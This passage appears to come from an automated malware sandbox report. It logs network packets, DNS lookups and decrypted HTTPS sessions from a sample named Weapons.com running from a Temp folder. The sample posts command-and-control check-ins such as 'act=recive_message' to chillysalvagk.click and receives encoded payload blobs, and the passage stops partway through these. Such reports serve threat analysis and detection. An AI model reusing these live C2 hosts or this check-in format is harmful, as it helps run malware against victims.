                                                                  Dec 20, 2024 18:17:39.242803097 CET44349737172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:39.242908001 CET49737443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:39.244071960 CET49737443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:39.244100094 CET44349737172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:39.244426966 CET44349737172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:39.245515108 CET49737443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:39.245556116 CET49737443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:39.245635033 CET44349737172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:41.045753956 CET44349737172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:41.045826912 CET44349737172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:41.045847893 CET44349737172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:41.045908928 CET49737443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:41.045949936 CET44349737172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:41.046010017 CET49737443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:41.046082020 CET44349737172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:41.048794985 CET44349737172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:41.048844099 CET49737443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:41.048860073 CET44349737172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:41.057121992 CET44349737172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:41.057327032 CET49737443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:41.057426929 CET44349737172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:41.065504074 CET44349737172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:41.065681934 CET49737443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:41.065745115 CET44349737172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:41.115106106 CET49737443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:41.166029930 CET44349737172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:41.166158915 CET44349737172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:41.166208029 CET49737443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:41.166366100 CET49737443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:41.166366100 CET49737443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:41.166410923 CET44349737172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:41.166436911 CET44349737172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:41.247637033 CET49739443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:41.247683048 CET44349739172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:41.248306036 CET49739443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:41.248869896 CET49739443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:41.248884916 CET44349739172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:42.473906040 CET44349739172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:42.474097013 CET49739443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:42.475388050 CET49739443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:42.475418091 CET44349739172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:42.475644112 CET44349739172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:42.485560894 CET49739443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:42.485676050 CET49739443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:42.485713005 CET44349739172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:42.486313105 CET49739443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:42.486372948 CET44349739172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:43.479897022 CET44349739172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:43.480007887 CET44349739172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:43.480072975 CET49739443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:43.480202913 CET49739443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:43.480243921 CET44349739172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:43.500272036 CET49740443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:43.500319004 CET44349740172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:43.500396967 CET49740443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:43.500715017 CET49740443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:43.500734091 CET44349740172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:44.714762926 CET44349740172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:44.714852095 CET49740443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:44.716350079 CET49740443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:44.716386080 CET44349740172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:44.716728926 CET44349740172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:44.719149113 CET49740443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:44.719238043 CET49740443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:44.719284058 CET44349740172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:45.526803970 CET44349740172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:45.526916981 CET44349740172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:45.526982069 CET49740443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:45.527081013 CET49740443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:45.527101994 CET44349740172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:45.609621048 CET49741443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:45.609677076 CET44349741172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:45.609761000 CET49741443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:45.610085011 CET49741443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:45.610096931 CET44349741172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:46.850759029 CET44349741172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:46.850847960 CET49741443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:46.853971004 CET49741443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:46.853981972 CET44349741172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:46.854387999 CET44349741172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:46.875320911 CET49741443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:46.875437021 CET49741443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:46.875488997 CET44349741172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:46.875560045 CET49741443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:46.875567913 CET44349741172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:47.804661989 CET44349741172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:47.804795027 CET44349741172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:47.804852962 CET49741443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:47.804971933 CET49741443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:47.804987907 CET44349741172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:47.906383991 CET49742443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:47.906528950 CET44349742172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:47.906615019 CET49742443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:47.917787075 CET49742443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:47.917865992 CET44349742172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:49.150970936 CET44349742172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:49.151088953 CET49742443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:49.152276039 CET49742443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:49.152307034 CET44349742172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:49.152795076 CET44349742172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:49.155739069 CET49742443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:49.155813932 CET49742443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:49.155826092 CET44349742172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:49.907521009 CET44349742172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:49.907767057 CET44349742172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:49.907859087 CET49742443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:49.907994986 CET49742443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:49.908035040 CET44349742172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:49.968835115 CET49743443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:49.968882084 CET44349743172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:49.968961954 CET49743443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:49.969296932 CET49743443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:49.969321966 CET44349743172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:51.191164017 CET44349743172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:51.191258907 CET49743443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:51.192462921 CET49743443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:51.192476988 CET44349743172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:51.193134069 CET44349743172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:51.194539070 CET49743443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:51.194617987 CET49743443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:51.194623947 CET44349743172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:52.012907982 CET44349743172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:52.013160944 CET44349743172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:52.013425112 CET49743443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:52.013889074 CET49743443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:52.013911009 CET44349743172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:52.015419006 CET49744443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:52.015531063 CET44349744172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:52.015666008 CET49744443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:52.015944958 CET49744443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:52.015984058 CET44349744172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:53.238668919 CET44349744172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:53.238785982 CET49744443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:53.240087032 CET49744443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:53.240117073 CET44349744172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:53.241205931 CET44349744172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:53.242628098 CET49744443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:53.242671967 CET49744443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:53.242816925 CET44349744172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:54.023075104 CET44349744172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:54.023303986 CET44349744172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:54.023389101 CET49744443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:54.023570061 CET49744443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:54.023618937 CET44349744172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:54.023650885 CET49744443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:54.023667097 CET44349744172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:54.490596056 CET49745443192.168.2.4104.21.84.113
                                                                  Dec 20, 2024 18:17:54.490680933 CET44349745104.21.84.113192.168.2.4
                                                                  Dec 20, 2024 18:17:54.490772009 CET49745443192.168.2.4104.21.84.113
                                                                  Dec 20, 2024 18:17:54.491117954 CET49745443192.168.2.4104.21.84.113
                                                                  Dec 20, 2024 18:17:54.491153002 CET44349745104.21.84.113192.168.2.4
                                                                  Dec 20, 2024 18:17:55.713069916 CET44349745104.21.84.113192.168.2.4
                                                                  Dec 20, 2024 18:17:55.713159084 CET49745443192.168.2.4104.21.84.113
                                                                  Dec 20, 2024 18:17:55.717154980 CET49745443192.168.2.4104.21.84.113
                                                                  Dec 20, 2024 18:17:55.717180014 CET44349745104.21.84.113192.168.2.4
                                                                  Dec 20, 2024 18:17:55.717685938 CET44349745104.21.84.113192.168.2.4
                                                                  Dec 20, 2024 18:17:55.719376087 CET49745443192.168.2.4104.21.84.113
                                                                  Dec 20, 2024 18:17:55.763346910 CET44349745104.21.84.113192.168.2.4
                                                                  Dec 20, 2024 18:17:56.149738073 CET44349745104.21.84.113192.168.2.4
                                                                  Dec 20, 2024 18:17:56.149852037 CET44349745104.21.84.113192.168.2.4
                                                                  Dec 20, 2024 18:17:56.149961948 CET44349745104.21.84.113192.168.2.4
                                                                  Dec 20, 2024 18:17:56.150026083 CET49745443192.168.2.4104.21.84.113
                                                                  Dec 20, 2024 18:17:56.150051117 CET44349745104.21.84.113192.168.2.4
                                                                  Dec 20, 2024 18:17:56.150077105 CET44349745104.21.84.113192.168.2.4
                                                                  Dec 20, 2024 18:17:56.150106907 CET49745443192.168.2.4104.21.84.113
                                                                  Dec 20, 2024 18:17:56.150311947 CET44349745104.21.84.113192.168.2.4
                                                                  Dec 20, 2024 18:17:56.150367022 CET49745443192.168.2.4104.21.84.113
                                                                  Dec 20, 2024 18:17:56.150409937 CET49745443192.168.2.4104.21.84.113
                                                                  Dec 20, 2024 18:17:56.150449991 CET44349745104.21.84.113192.168.2.4
                                                                  Dec 20, 2024 18:17:56.150480032 CET49745443192.168.2.4104.21.84.113
                                                                  Dec 20, 2024 18:17:56.150496006 CET44349745104.21.84.113192.168.2.4

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Dec 20, 2024 18:17:20.639723063 CET5210953192.168.2.41.1.1.1
                                                                  Dec 20, 2024 18:17:20.856610060 CET53521091.1.1.1192.168.2.4
                                                                  Dec 20, 2024 18:17:35.693978071 CET5829153192.168.2.41.1.1.1
                                                                  Dec 20, 2024 18:17:36.018395901 CET53582911.1.1.1192.168.2.4
                                                                  Dec 20, 2024 18:17:54.025228024 CET5543753192.168.2.41.1.1.1
                                                                  Dec 20, 2024 18:17:54.489650011 CET53554371.1.1.1192.168.2.4

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Dec 20, 2024 18:17:20.639723063 CET192.168.2.41.1.1.10x3bb1Standard query (0)lWQLYFSSyUSsI.lWQLYFSSyUSsIA (IP address)IN (0x0001)false
                                                                  Dec 20, 2024 18:17:35.693978071 CET192.168.2.41.1.1.10x2d23Standard query (0)chillysalvagk.clickA (IP address)IN (0x0001)false
                                                                  Dec 20, 2024 18:17:54.025228024 CET192.168.2.41.1.1.10x2877Standard query (0)kliptizq.shopA (IP address)IN (0x0001)false

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Dec 20, 2024 18:17:20.856610060 CET1.1.1.1192.168.2.40x3bb1Name error (3)lWQLYFSSyUSsI.lWQLYFSSyUSsInonenoneA (IP address)IN (0x0001)false
                                                                  Dec 20, 2024 18:17:36.018395901 CET1.1.1.1192.168.2.40x2d23No error (0)chillysalvagk.click172.67.202.229A (IP address)IN (0x0001)false
                                                                  Dec 20, 2024 18:17:36.018395901 CET1.1.1.1192.168.2.40x2d23No error (0)chillysalvagk.click104.21.42.70A (IP address)IN (0x0001)false
                                                                  Dec 20, 2024 18:17:54.489650011 CET1.1.1.1192.168.2.40x2877No error (0)kliptizq.shop104.21.84.113A (IP address)IN (0x0001)false
                                                                  Dec 20, 2024 18:17:54.489650011 CET1.1.1.1192.168.2.40x2877No error (0)kliptizq.shop172.67.191.144A (IP address)IN (0x0001)false

                                                                  HTTP Request Dependency Graph

                                                                  • chillysalvagk.click
                                                                  • kliptizq.shop

                                                                  HTTPS Proxied Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.449735172.67.202.2294431928C:\Users\user\AppData\Local\Temp\405361\Weapons.com
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-20 17:17:37 UTC266OUTPOST /api HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                  Content-Length: 8
                                                                  Host: chillysalvagk.click
                                                                  2024-12-20 17:17:37 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                  Data Ascii: act=life
                                                                  2024-12-20 17:17:38 UTC1139INHTTP/1.1 200 OK
                                                                  Date: Fri, 20 Dec 2024 17:17:37 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: PHPSESSID=cs8i8insomo26vqgnond7pj6dv; expires=Tue, 15 Apr 2025 11:04:16 GMT; Max-Age=9999999; path=/
                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                  Pragma: no-cache
                                                                  X-Frame-Options: DENY
                                                                  X-Content-Type-Options: nosniff
                                                                  X-XSS-Protection: 1; mode=block
                                                                  cf-cache-status: DYNAMIC
                                                                  vary: accept-encoding
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3NBBN%2BwCbTH87fT9fqGi%2By1KbMmgpu4E1NleNbpkMHpATXqdm%2FUr8TfSoX%2FfZ%2BA%2F%2BKn0Rxes7y%2FvqD4oUprT4M%2Bzw2hdZ%2F7MztikT4pnuAYrTCGYEeQtVjP927WmiGQ0Cm5xTxeJ"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8f5149759d2519c3-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1802&min_rtt=1792&rtt_var=692&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=910&delivery_rate=1559829&cwnd=148&unsent_bytes=0&cid=223bcfdfa7c566e8&ts=785&x=0"
                                                                  2024-12-20 17:17:38 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                  Data Ascii: 2ok
                                                                  2024-12-20 17:17:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.449737172.67.202.2294431928C:\Users\user\AppData\Local\Temp\405361\Weapons.com
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-20 17:17:39 UTC267OUTPOST /api HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                  Content-Length: 77
                                                                  Host: chillysalvagk.click
                                                                  2024-12-20 17:17:39 UTC77OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 47 41 53 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64
                                                                  Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--GAS&j=efdebde057a1df3f7c15b7f4da907c2d
                                                                  2024-12-20 17:17:41 UTC1130INHTTP/1.1 200 OK
                                                                  Date: Fri, 20 Dec 2024 17:17:40 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: PHPSESSID=qcng885jcveeslp4u20q1budgq; expires=Tue, 15 Apr 2025 11:04:19 GMT; Max-Age=9999999; path=/
                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                  Pragma: no-cache
                                                                  X-Frame-Options: DENY
                                                                  X-Content-Type-Options: nosniff
                                                                  X-XSS-Protection: 1; mode=block
                                                                  cf-cache-status: DYNAMIC
                                                                  vary: accept-encoding
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eb6OGcerIIwlFIptygkpfX7LGtUZSuvNLteNhDN2yOM%2Bqy5LQHVgGM6HdjMeVBV%2FpKuCdOqTjgilFgGoYz0%2FpfD97cmLgD3%2BZfGk236TK1yEYQvPm3QzjjaW%2FF715WipHgReRz5e"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8f51498219908cee-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1919&min_rtt=1917&rtt_var=724&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=980&delivery_rate=1507485&cwnd=252&unsent_bytes=0&cid=a65b215953ff23b6&ts=1813&x=0"
                                                                  2024-12-20 17:17:41 UTC239INData Raw: 33 61 38 38 0d 0a 47 37 68 33 46 72 39 52 61 6b 36 54 4d 53 71 74 59 51 6a 38 4c 76 47 61 36 75 47 74 66 36 4d 72 39 77 48 6d 47 76 39 67 51 4e 46 67 6d 67 45 30 68 57 56 47 62 4f 42 55 43 4a 63 48 61 5a 42 64 6c 4c 62 49 67 4d 6c 64 6d 55 32 57 62 5a 56 2f 30 30 49 32 76 44 6d 43 45 58 66 54 49 67 39 69 73 56 52 53 6a 31 74 54 68 77 79 55 39 4d 6a 62 6a 78 72 4a 53 5a 5a 74 68 48 75 55 44 7a 43 39 65 4e 41 62 63 64 63 30 43 53 72 79 58 55 66 49 42 47 32 64 52 4a 2f 7a 68 34 6e 41 58 59 38 4a 6b 6e 76 45 49 4e 30 74 4a 61 56 36 39 52 5a 6c 31 48 4d 58 59 75 67 54 54 38 4e 44 4d 74 35 50 6c 50 69 47 68 38 6b 55 79 30 4f 66 5a 59 56 2b 6c 52 41 70 74 33 50 51 46 58 4c 57 50 67 41 2b 2f 31 64 41 77 77 4a 6e 6e
                                                                  Data Ascii: 3a88G7h3Fr9Rak6TMSqtYQj8LvGa6uGtf6Mr9wHmGv9gQNFgmgE0hWVGbOBUCJcHaZBdlLbIgMldmU2WbZV/00I2vDmCEXfTIg9isVRSj1tThwyU9MjbjxrJSZZthHuUDzC9eNAbcdc0CSryXUfIBG2dRJ/zh4nAXY8JknvEIN0tJaV69RZl1HMXYugTT8NDMt5PlPiGh8kUy0OfZYV+lRApt3PQFXLWPgA+/1dAwwJnn
                                                                  2024-12-20 17:17:41 UTC1369INData Raw: 51 7a 64 75 49 2b 62 6a 30 57 42 47 71 64 67 6c 57 6d 49 44 7a 4b 31 4f 63 56 62 62 5a 30 30 42 47 79 70 45 30 44 44 44 57 2b 64 51 35 54 35 69 4a 48 41 48 63 4a 42 6e 57 65 4f 64 35 49 4e 4c 4c 6c 2b 30 68 78 7a 30 6a 51 41 4b 76 35 51 43 49 46 44 62 59 59 4d 79 37 69 6f 6b 38 77 65 31 55 53 45 49 35 73 32 68 45 49 6c 76 7a 6d 43 56 58 4c 54 4d 67 55 73 34 31 74 44 78 41 5a 34 6c 55 57 65 39 59 69 4f 78 52 4c 43 53 5a 4a 70 6a 6e 65 58 42 69 2b 2b 66 39 6f 56 4e 4a 4e 7a 44 7a 53 78 43 77 6a 73 42 6e 71 5a 51 49 57 36 73 73 50 51 55 39 67 4a 6b 6d 2f 45 49 4e 30 4b 4a 37 42 36 30 52 70 33 31 54 67 61 4c 4f 4e 56 52 63 6f 52 62 4a 74 43 6d 66 75 61 69 63 45 62 77 6b 43 65 61 6f 46 2f 6d 55 4a 73 38 33 37 43 56 53 79 64 45 67 55 6e 2f 56 6c 66 7a 30 4e 31
                                                                  Data Ascii: QzduI+bj0WBGqdglWmIDzK1OcVbbZ00BGypE0DDDW+dQ5T5iJHAHcJBnWeOd5INLLl+0hxz0jQAKv5QCIFDbYYMy7iok8we1USEI5s2hEIlvzmCVXLTMgUs41tDxAZ4lUWe9YiOxRLCSZJpjneXBi++f9oVNJNzDzSxCwjsBnqZQIW6ssPQU9gJkm/EIN0KJ7B60Rp31TgaLONVRcoRbJtCmfuaicEbwkCeaoF/mUJs837CVSydEgUn/Vlfz0N1
                                                                  2024-12-20 17:17:41 UTC1369INData Raw: 53 61 6a 38 55 62 7a 6b 53 5a 49 38 6f 34 6d 68 70 69 36 7a 6e 77 46 6d 44 65 4f 55 6f 5a 38 6c 31 47 79 42 55 71 67 51 4b 4b 75 49 2b 50 6a 30 57 42 52 4a 52 72 67 6d 71 53 44 79 47 39 64 39 55 51 65 39 55 7a 43 43 48 30 56 30 50 45 41 47 65 61 58 70 6e 34 67 49 62 4f 46 38 73 4a 32 79 4f 44 59 4e 31 61 59 6f 4a 75 30 56 64 42 33 6a 30 47 4b 2b 63 54 56 34 45 61 4b 70 6c 41 30 36 44 49 6a 73 63 59 78 45 61 55 61 59 70 39 6c 77 34 71 76 58 72 49 47 6e 44 64 50 77 41 6d 2f 46 31 4d 78 77 70 68 6c 55 71 54 2b 59 4c 44 67 56 33 47 55 64 55 37 78 45 79 61 44 69 2b 38 4f 2b 38 57 65 74 4d 30 48 6d 7a 75 48 56 47 50 42 47 62 65 46 4e 50 30 67 59 50 45 46 38 56 4a 6b 6d 36 42 65 35 6f 42 4c 37 52 7a 31 42 4a 77 30 54 6f 46 4b 76 46 55 54 4d 6f 52 62 35 64 41 6e
                                                                  Data Ascii: Saj8UbzkSZI8o4mhpi6znwFmDeOUoZ8l1GyBUqgQKKuI+Pj0WBRJRrgmqSDyG9d9UQe9UzCCH0V0PEAGeaXpn4gIbOF8sJ2yODYN1aYoJu0VdB3j0GK+cTV4EaKplA06DIjscYxEaUaYp9lw4qvXrIGnDdPwAm/F1MxwphlUqT+YLDgV3GUdU7xEyaDi+8O+8WetM0HmzuHVGPBGbeFNP0gYPEF8VJkm6Be5oBL7Rz1BJw0ToFKvFUTMoRb5dAn
                                                                  2024-12-20 17:17:41 UTC1369INData Raw: 5a 58 64 34 48 6a 43 4f 44 64 4e 31 61 59 72 70 77 79 42 74 36 31 44 34 4f 4a 50 5a 64 52 63 51 46 59 5a 6c 4c 6c 66 57 41 6a 73 6f 65 77 45 32 66 63 59 64 7a 6c 77 38 6f 38 7a 65 61 45 6d 79 64 61 30 67 4c 2f 58 70 59 31 42 46 38 33 6c 50 64 34 63 69 45 77 31 32 5a 43 5a 5a 73 6a 58 65 56 43 69 32 38 66 64 51 54 63 74 41 32 42 79 62 6a 57 30 62 43 43 47 57 56 58 70 50 31 6a 49 2f 4c 46 63 70 44 31 53 33 45 66 34 56 43 65 76 4e 4d 31 78 70 30 33 69 56 49 4d 37 39 4b 43 4d 67 50 4b 73 59 4d 6e 2f 61 49 6a 4d 4d 52 79 6b 47 55 62 34 70 2f 6d 41 73 71 75 32 76 62 45 58 7a 63 50 51 63 74 39 56 5a 4e 79 77 52 75 6d 45 50 54 74 73 69 45 31 31 32 5a 43 62 70 45 73 54 71 38 4f 47 4b 73 4e 38 4e 56 63 39 46 7a 55 47 7a 39 55 45 54 48 44 47 79 58 51 4a 6e 78 67 34
                                                                  Data Ascii: ZXd4HjCODdN1aYrpwyBt61D4OJPZdRcQFYZlLlfWAjsoewE2fcYdzlw8o8zeaEmyda0gL/XpY1BF83lPd4ciEw12ZCZZsjXeVCi28fdQTctA2BybjW0bCCGWVXpP1jI/LFcpD1S3Ef4VCevNM1xp03iVIM79KCMgPKsYMn/aIjMMRykGUb4p/mAsqu2vbEXzcPQct9VZNywRumEPTtsiE112ZCbpEsTq8OGKsN8NVc9FzUGz9UETHDGyXQJnxg4
